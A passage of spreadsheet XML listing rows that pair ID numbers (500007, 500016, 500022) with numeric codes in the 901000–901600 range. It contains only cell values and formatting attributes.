      <c r="B105" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="106" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A106" s="5">
        <v>500007</v>
      </c>
      <c r="B106" s="3">
        <v>901071.00300000003</v>
      </c>
    </row>
    <row r="107" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A107" s="5">
        <v>500007</v>
      </c>
      <c r="B107" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="108" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A108" s="5">
        <v>500007</v>
      </c>
      <c r="B108" s="3">
        <v>901119</v>
      </c>
    </row>
    <row r="109" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A109" s="5">
        <v>500007</v>
      </c>
      <c r="B109" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="110" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A110" s="5">
        <v>500007</v>
      </c>
      <c r="B110" s="3">
        <v>901037.00100000005</v>
      </c>
    </row>
    <row r="111" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A111" s="5">
        <v>500007</v>
      </c>
      <c r="B111" s="3">
        <v>901110</v>
      </c>
    </row>
    <row r="112" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A112" s="5">
        <v>500007</v>
      </c>
      <c r="B112" s="3">
        <v>901110.00100000005</v>
      </c>
    </row>
    <row r="113" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A113" s="5">
        <v>500007</v>
      </c>
      <c r="B113" s="3">
        <v>901110.00300000003</v>
      </c>
    </row>
    <row r="114" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A114" s="5">
        <v>500007</v>
      </c>
      <c r="B114" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="115" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A115" s="5">
        <v>500007</v>
      </c>
      <c r="B115" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="116" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A116" s="5">
        <v>500007</v>
      </c>
      <c r="B116" s="3">
        <v>901092</v>
      </c>
    </row>
    <row r="117" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A117" s="5">
        <v>500007</v>
      </c>
      <c r="B117" s="3">
        <v>901213</v>
      </c>
    </row>
    <row r="118" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A118" s="5">
        <v>500007</v>
      </c>
      <c r="B118" s="3">
        <v>901213.00199999998</v>
      </c>
    </row>
    <row r="119" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A119" s="5">
        <v>500007</v>
      </c>
      <c r="B119" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="120" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A120" s="5">
        <v>500007</v>
      </c>
      <c r="B120" s="3">
        <v>901039</v>
      </c>
    </row>
    <row r="121" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A121" s="5">
        <v>500007</v>
      </c>
      <c r="B121" s="3">
        <v>901025</v>
      </c>
    </row>
    <row r="122" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A122" s="5">
        <v>500007</v>
      </c>
      <c r="B122" s="3">
        <v>901001.00100000005</v>
      </c>
    </row>
    <row r="123" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A123" s="5">
        <v>500007</v>
      </c>
      <c r="B123" s="3">
        <v>901074.00100000005</v>
      </c>
    </row>
    <row r="124" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A124" s="5">
        <v>500007</v>
      </c>
      <c r="B124" s="3">
        <v>901074.00199999998</v>
      </c>
    </row>
    <row r="125" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A125" s="5">
        <v>500007</v>
      </c>
      <c r="B125" s="3">
        <v>901030</v>
      </c>
    </row>
    <row r="126" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A126" s="5">
        <v>500007</v>
      </c>
      <c r="B126" s="3">
        <v>901140</v>
      </c>
    </row>
    <row r="127" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A127" s="5">
        <v>500007</v>
      </c>
      <c r="B127" s="3">
        <v>901114.00199999998</v>
      </c>
    </row>
    <row r="128" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A128" s="5">
        <v>500007</v>
      </c>
      <c r="B128" s="3">
        <v>901573.00100000005</v>
      </c>
    </row>
    <row r="129" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A129" s="5">
        <v>500007</v>
      </c>
      <c r="B129" s="3">
        <v>901546.01500000001</v>
      </c>
    </row>
    <row r="130" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A130" s="5">
        <v>500007</v>
      </c>
      <c r="B130" s="3">
        <v>901048.00199999998</v>
      </c>
    </row>
    <row r="131" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A131" s="5">
        <v>500007</v>
      </c>
      <c r="B131" s="3">
        <v>901567</v>
      </c>
    </row>
    <row r="132" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A132" s="5">
        <v>500007</v>
      </c>
      <c r="B132" s="3">
        <v>901190</v>
      </c>
    </row>
    <row r="133" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A133" s="5">
        <v>500007</v>
      </c>
      <c r="B133" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="134" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A134" s="5">
        <v>500007</v>
      </c>
      <c r="B134" s="3">
        <v>901211</v>
      </c>
    </row>
    <row r="135" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A135" s="5">
        <v>500007</v>
      </c>
      <c r="B135" s="3">
        <v>901068</v>
      </c>
    </row>
    <row r="136" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A136" s="5">
        <v>500007</v>
      </c>
      <c r="B136" s="3">
        <v>901210</v>
      </c>
    </row>
    <row r="137" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A137" s="5">
        <v>500007</v>
      </c>
      <c r="B137" s="3">
        <v>901133</v>
      </c>
    </row>
    <row r="138" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A138" s="5">
        <v>500007</v>
      </c>
      <c r="B138" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="139" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A139" s="5">
        <v>500007</v>
      </c>
      <c r="B139" s="3">
        <v>901589.00100000005</v>
      </c>
    </row>
    <row r="140" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A140" s="5">
        <v>500007</v>
      </c>
      <c r="B140" s="3">
        <v>901564.00100000005</v>
      </c>
    </row>
    <row r="141" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A141" s="5">
        <v>500007</v>
      </c>
      <c r="B141" s="3">
        <v>901070.00100000005</v>
      </c>
    </row>
    <row r="142" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A142" s="5">
        <v>500007</v>
      </c>
      <c r="B142" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="143" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A143" s="5">
        <v>500007</v>
      </c>
      <c r="B143" s="3">
        <v>901070.00600000005</v>
      </c>
    </row>
    <row r="144" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A144" s="5">
        <v>500007</v>
      </c>
      <c r="B144" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="145" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A145" s="5">
        <v>500007</v>
      </c>
      <c r="B145" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="146" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A146" s="5">
        <v>500007</v>
      </c>
      <c r="B146" s="3">
        <v>901036</v>
      </c>
    </row>
    <row r="147" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A147" s="5">
        <v>500007</v>
      </c>
      <c r="B147" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="148" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A148" s="5">
        <v>500007</v>
      </c>
      <c r="B148" s="3">
        <v>901498</v>
      </c>
    </row>
    <row r="149" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A149" s="5">
        <v>500007</v>
      </c>
      <c r="B149" s="3">
        <v>901040</v>
      </c>
    </row>
    <row r="150" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A150" s="5">
        <v>500007</v>
      </c>
      <c r="B150" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="151" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A151" s="5">
        <v>500007</v>
      </c>
      <c r="B151" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="152" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A152" s="5">
        <v>500007</v>
      </c>
      <c r="B152" s="3">
        <v>901137.00199999998</v>
      </c>
    </row>
    <row r="153" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A153" s="5">
        <v>500007</v>
      </c>
      <c r="B153" s="3">
        <v>901003</v>
      </c>
    </row>
    <row r="154" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A154" s="5">
        <v>500007</v>
      </c>
      <c r="B154" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="155" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A155" s="5">
        <v>500007</v>
      </c>
      <c r="B155" s="3">
        <v>901003.00300000003</v>
      </c>
    </row>
    <row r="156" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A156" s="5">
        <v>500007</v>
      </c>
      <c r="B156" s="3">
        <v>901120</v>
      </c>
    </row>
    <row r="157" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A157" s="5">
        <v>500007</v>
      </c>
      <c r="B157" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="158" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A158" s="5">
        <v>500007</v>
      </c>
      <c r="B158" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="159" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A159" s="5">
        <v>500007</v>
      </c>
      <c r="B159" s="3">
        <v>901598</v>
      </c>
    </row>
    <row r="160" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A160" s="5">
        <v>500007</v>
      </c>
      <c r="B160" s="3">
        <v>901542.00300000003</v>
      </c>
    </row>
    <row r="161" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A161" s="5">
        <v>500007</v>
      </c>
      <c r="B161" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="162" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A162" s="5">
        <v>500007</v>
      </c>
      <c r="B162" s="3">
        <v>901090.00199999998</v>
      </c>
    </row>
    <row r="163" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A163" s="5">
        <v>500007</v>
      </c>
      <c r="B163" s="3">
        <v>901090.00300000003</v>
      </c>
    </row>
    <row r="164" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A164" s="5">
        <v>500007</v>
      </c>
      <c r="B164" s="3">
        <v>901021.00199999998</v>
      </c>
    </row>
    <row r="165" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A165" s="5">
        <v>500007</v>
      </c>
      <c r="B165" s="3">
        <v>901091</v>
      </c>
    </row>
    <row r="166" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A166" s="5">
        <v>500007</v>
      </c>
      <c r="B166" s="3">
        <v>901014</v>
      </c>
    </row>
    <row r="167" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A167" s="5">
        <v>500007</v>
      </c>
      <c r="B167" s="3">
        <v>901113</v>
      </c>
    </row>
    <row r="168" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A168" s="5">
        <v>500007</v>
      </c>
      <c r="B168" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="169" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A169" s="5">
        <v>500007</v>
      </c>
      <c r="B169" s="3">
        <v>901218.01100000006</v>
      </c>
    </row>
    <row r="170" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A170" s="5">
        <v>500007</v>
      </c>
      <c r="B170" s="3">
        <v>901528</v>
      </c>
    </row>
    <row r="171" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A171" s="5">
        <v>500007</v>
      </c>
      <c r="B171" s="3">
        <v>901221</v>
      </c>
    </row>
    <row r="172" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A172" s="5">
        <v>500007</v>
      </c>
      <c r="B172" s="3">
        <v>901199</v>
      </c>
    </row>
    <row r="173" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A173" s="5">
        <v>500007</v>
      </c>
      <c r="B173" s="3">
        <v>901550.00100000005</v>
      </c>
    </row>
    <row r="174" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A174" s="5">
        <v>500007</v>
      </c>
      <c r="B174" s="3">
        <v>901550.00199999998</v>
      </c>
    </row>
    <row r="175" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A175" s="5">
        <v>500007</v>
      </c>
      <c r="B175" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="176" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A176" s="5">
        <v>500007</v>
      </c>
      <c r="B176" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="177" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A177" s="5">
        <v>500007</v>
      </c>
      <c r="B177" s="3">
        <v>901078.00399999996</v>
      </c>
    </row>
    <row r="178" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A178" s="5">
        <v>500007</v>
      </c>
      <c r="B178" s="3">
        <v>901102.00199999998</v>
      </c>
    </row>
    <row r="179" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A179" s="5">
        <v>500016</v>
      </c>
      <c r="B179" s="3">
        <v>901548.00199999998</v>
      </c>
    </row>
    <row r="180" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A180" s="5">
        <v>500016</v>
      </c>
      <c r="B180" s="3">
        <v>901087.00100000005</v>
      </c>
    </row>
    <row r="181" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A181" s="5">
        <v>500016</v>
      </c>
      <c r="B181" s="3">
        <v>901098.00100000005</v>
      </c>
    </row>
    <row r="182" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A182" s="5">
        <v>500016</v>
      </c>
      <c r="B182" s="3">
        <v>901098.00199999998</v>
      </c>
    </row>
    <row r="183" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A183" s="5">
        <v>500016</v>
      </c>
      <c r="B183" s="3">
        <v>901583.00100000005</v>
      </c>
    </row>
    <row r="184" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A184" s="5">
        <v>500016</v>
      </c>
      <c r="B184" s="3">
        <v>901583.00600000005</v>
      </c>
    </row>
    <row r="185" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A185" s="5">
        <v>500016</v>
      </c>
      <c r="B185" s="3">
        <v>901595.00199999998</v>
      </c>
    </row>
    <row r="186" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A186" s="5">
        <v>500016</v>
      </c>
      <c r="B186" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="187" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A187" s="5">
        <v>500016</v>
      </c>
      <c r="B187" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="188" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A188" s="5">
        <v>500016</v>
      </c>
      <c r="B188" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="189" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A189" s="5">
        <v>500016</v>
      </c>
      <c r="B189" s="3">
        <v>901547.00899999996</v>
      </c>
    </row>
    <row r="190" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A190" s="5">
        <v>500016</v>
      </c>
      <c r="B190" s="3">
        <v>901110.00300000003</v>
      </c>
    </row>
    <row r="191" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A191" s="5">
        <v>500016</v>
      </c>
      <c r="B191" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="192" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A192" s="5">
        <v>500016</v>
      </c>
      <c r="B192" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="193" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A193" s="5">
        <v>500016</v>
      </c>
      <c r="B193" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="194" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A194" s="5">
        <v>500016</v>
      </c>
      <c r="B194" s="3">
        <v>901059.00600000005</v>
      </c>
    </row>
    <row r="195" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A195" s="5">
        <v>500016</v>
      </c>
      <c r="B195" s="3">
        <v>901584.00100000005</v>
      </c>
    </row>
    <row r="196" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A196" s="5">
        <v>500016</v>
      </c>
      <c r="B196" s="3">
        <v>901555</v>
      </c>
    </row>
    <row r="197" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A197" s="5">
        <v>500016</v>
      </c>
      <c r="B197" s="3">
        <v>901213.00300000003</v>
      </c>
    </row>
    <row r="198" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A198" s="5">
        <v>500016</v>
      </c>
      <c r="B198" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="199" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A199" s="5">
        <v>500016</v>
      </c>
      <c r="B199" s="3">
        <v>901001.00199999998</v>
      </c>
    </row>
    <row r="200" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A200" s="5">
        <v>500016</v>
      </c>
      <c r="B200" s="3">
        <v>901074.00199999998</v>
      </c>
    </row>
    <row r="201" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A201" s="5">
        <v>500016</v>
      </c>
      <c r="B201" s="3">
        <v>901140</v>
      </c>
    </row>
    <row r="202" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A202" s="5">
        <v>500016</v>
      </c>
      <c r="B202" s="3">
        <v>901587.00100000005</v>
      </c>
    </row>
    <row r="203" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A203" s="5">
        <v>500016</v>
      </c>
      <c r="B203" s="3">
        <v>901587.00300000003</v>
      </c>
    </row>
    <row r="204" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A204" s="5">
        <v>500016</v>
      </c>
      <c r="B204" s="3">
        <v>901484.00199999998</v>
      </c>
    </row>
    <row r="205" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A205" s="5">
        <v>500016</v>
      </c>
      <c r="B205" s="3">
        <v>901482</v>
      </c>
    </row>
    <row r="206" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A206" s="5">
        <v>500016</v>
      </c>
      <c r="B206" s="3">
        <v>901568</v>
      </c>
    </row>
    <row r="207" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A207" s="5">
        <v>500016</v>
      </c>
      <c r="B207" s="3">
        <v>901114.00199999998</v>
      </c>
    </row>
    <row r="208" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A208" s="5">
        <v>500016</v>
      </c>
      <c r="B208" s="3">
        <v>901546.00300000003</v>
      </c>
    </row>
    <row r="209" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A209" s="5">
        <v>500016</v>
      </c>
      <c r="B209" s="3">
        <v>901546.00800000003</v>
      </c>
    </row>
    <row r="210" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A210" s="5">
        <v>500016</v>
      </c>
      <c r="B210" s="3">
        <v>901048.00199999998</v>
      </c>
    </row>
    <row r="211" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A211" s="5">
        <v>500016</v>
      </c>
      <c r="B211" s="3">
        <v>901190</v>
      </c>
    </row>
    <row r="212" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A212" s="5">
        <v>500016</v>
      </c>
      <c r="B212" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="213" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A213" s="5">
        <v>500016</v>
      </c>
      <c r="B213" s="3">
        <v>901133</v>
      </c>
    </row>
    <row r="214" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A214" s="5">
        <v>500016</v>
      </c>
      <c r="B214" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="215" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A215" s="5">
        <v>500016</v>
      </c>
      <c r="B215" s="3">
        <v>901606.00100000005</v>
      </c>
    </row>
    <row r="216" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A216" s="5">
        <v>500016</v>
      </c>
      <c r="B216" s="3">
        <v>901606.00199999998</v>
      </c>
    </row>
    <row r="217" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A217" s="5">
        <v>500016</v>
      </c>
      <c r="B217" s="3">
        <v>901562.00100000005</v>
      </c>
    </row>
    <row r="218" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A218" s="5">
        <v>500016</v>
      </c>
      <c r="B218" s="3">
        <v>901562.00199999998</v>
      </c>
    </row>
    <row r="219" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A219" s="5">
        <v>500016</v>
      </c>
      <c r="B219" s="3">
        <v>901562.00399999996</v>
      </c>
    </row>
    <row r="220" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A220" s="5">
        <v>500016</v>
      </c>
      <c r="B220" s="3">
        <v>901070</v>
      </c>
    </row>
    <row r="221" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A221" s="5">
        <v>500016</v>
      </c>
      <c r="B221" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="222" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A222" s="5">
        <v>500016</v>
      </c>
      <c r="B222" s="3">
        <v>901070.00600000005</v>
      </c>
    </row>
    <row r="223" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A223" s="5">
        <v>500016</v>
      </c>
      <c r="B223" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="224" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A224" s="5">
        <v>500016</v>
      </c>
      <c r="B224" s="3">
        <v>901036</v>
      </c>
    </row>
    <row r="225" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A225" s="5">
        <v>500016</v>
      </c>
      <c r="B225" s="3">
        <v>901036.00399999996</v>
      </c>
    </row>
    <row r="226" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A226" s="5">
        <v>500016</v>
      </c>
      <c r="B226" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="227" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A227" s="5">
        <v>500016</v>
      </c>
      <c r="B227" s="3">
        <v>901095</v>
      </c>
    </row>
    <row r="228" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A228" s="5">
        <v>500016</v>
      </c>
      <c r="B228" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="229" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A229" s="5">
        <v>500016</v>
      </c>
      <c r="B229" s="3">
        <v>901027.00100000005</v>
      </c>
    </row>
    <row r="230" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A230" s="5">
        <v>500016</v>
      </c>
      <c r="B230" s="3">
        <v>901027.00199999998</v>
      </c>
    </row>
    <row r="231" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A231" s="5">
        <v>500016</v>
      </c>
      <c r="B231" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="232" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A232" s="5">
        <v>500016</v>
      </c>
      <c r="B232" s="3">
        <v>901003.00600000005</v>
      </c>
    </row>
    <row r="233" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A233" s="5">
        <v>500016</v>
      </c>
      <c r="B233" s="3">
        <v>901069.00100000005</v>
      </c>
    </row>
    <row r="234" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A234" s="5">
        <v>500016</v>
      </c>
      <c r="B234" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="235" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A235" s="5">
        <v>500016</v>
      </c>
      <c r="B235" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="236" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A236" s="5">
        <v>500016</v>
      </c>
      <c r="B236" s="3">
        <v>901566.00300000003</v>
      </c>
    </row>
    <row r="237" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A237" s="5">
        <v>500016</v>
      </c>
      <c r="B237" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="238" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A238" s="5">
        <v>500016</v>
      </c>
      <c r="B238" s="3">
        <v>901090.00100000005</v>
      </c>
    </row>
    <row r="239" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A239" s="5">
        <v>500016</v>
      </c>
      <c r="B239" s="3">
        <v>901090.00300000003</v>
      </c>
    </row>
    <row r="240" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A240" s="5">
        <v>500016</v>
      </c>
      <c r="B240" s="3">
        <v>901090.00399999996</v>
      </c>
    </row>
    <row r="241" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A241" s="5">
        <v>500016</v>
      </c>
      <c r="B241" s="3">
        <v>901021.00600000005</v>
      </c>
    </row>
    <row r="242" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A242" s="5">
        <v>500016</v>
      </c>
      <c r="B242" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="243" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A243" s="5">
        <v>500016</v>
      </c>
      <c r="B243" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="244" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A244" s="5">
        <v>500016</v>
      </c>
      <c r="B244" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="245" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A245" s="5">
        <v>500016</v>
      </c>
      <c r="B245" s="3">
        <v>901218.01100000006</v>
      </c>
    </row>
    <row r="246" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A246" s="5">
        <v>500016</v>
      </c>
      <c r="B246" s="3">
        <v>901558.00300000003</v>
      </c>
    </row>
    <row r="247" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A247" s="5">
        <v>500016</v>
      </c>
      <c r="B247" s="3">
        <v>901553.00199999998</v>
      </c>
    </row>
    <row r="248" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A248" s="5">
        <v>500016</v>
      </c>
      <c r="B248" s="3">
        <v>901195.00199999998</v>
      </c>
    </row>
    <row r="249" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A249" s="5">
        <v>500016</v>
      </c>
      <c r="B249" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="250" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A250" s="5">
        <v>500016</v>
      </c>
      <c r="B250" s="3">
        <v>901016.00100000005</v>
      </c>
    </row>
    <row r="251" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A251" s="5">
        <v>500016</v>
      </c>
      <c r="B251" s="3">
        <v>901199</v>
      </c>
    </row>
    <row r="252" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A252" s="5">
        <v>500016</v>
      </c>
      <c r="B252" s="3">
        <v>901552.00399999996</v>
      </c>
    </row>
    <row r="253" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A253" s="5">
        <v>500016</v>
      </c>
      <c r="B253" s="3">
        <v>901550</v>
      </c>
    </row>
    <row r="254" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A254" s="5">
        <v>500016</v>
      </c>
      <c r="B254" s="3">
        <v>901550.00300000003</v>
      </c>
    </row>
    <row r="255" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A255" s="5">
        <v>500016</v>
      </c>
      <c r="B255" s="3">
        <v>901550.00399999996</v>
      </c>
    </row>
    <row r="256" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A256" s="5">
        <v>500016</v>
      </c>
      <c r="B256" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="257" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A257" s="5">
        <v>500016</v>
      </c>
      <c r="B257" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="258" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A258" s="5">
        <v>500016</v>
      </c>
      <c r="B258" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="259" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A259" s="5">
        <v>500016</v>
      </c>
      <c r="B259" s="3">
        <v>901078.00199999998</v>
      </c>
    </row>
    <row r="260" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A260" s="5">
        <v>500016</v>
      </c>
      <c r="B260" s="3">
        <v>901102.00199999998</v>
      </c>
    </row>
    <row r="261" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A261" s="5">
        <v>500016</v>
      </c>
      <c r="B261" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="262" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A262" s="5">
        <v>500022</v>
      </c>
      <c r="B262" s="3">
        <v>901087.00100000005</v>
      </c>
    </row>
    <row r="263" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A263" s="5">
        <v>500022</v>
      </c>
      <c r="B263" s="3">
        <v>901098</v>
      </c>
    </row>
    <row r="264" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A264" s="5">
        <v>500022</v>
      </c>
      <c r="B264" s="3">
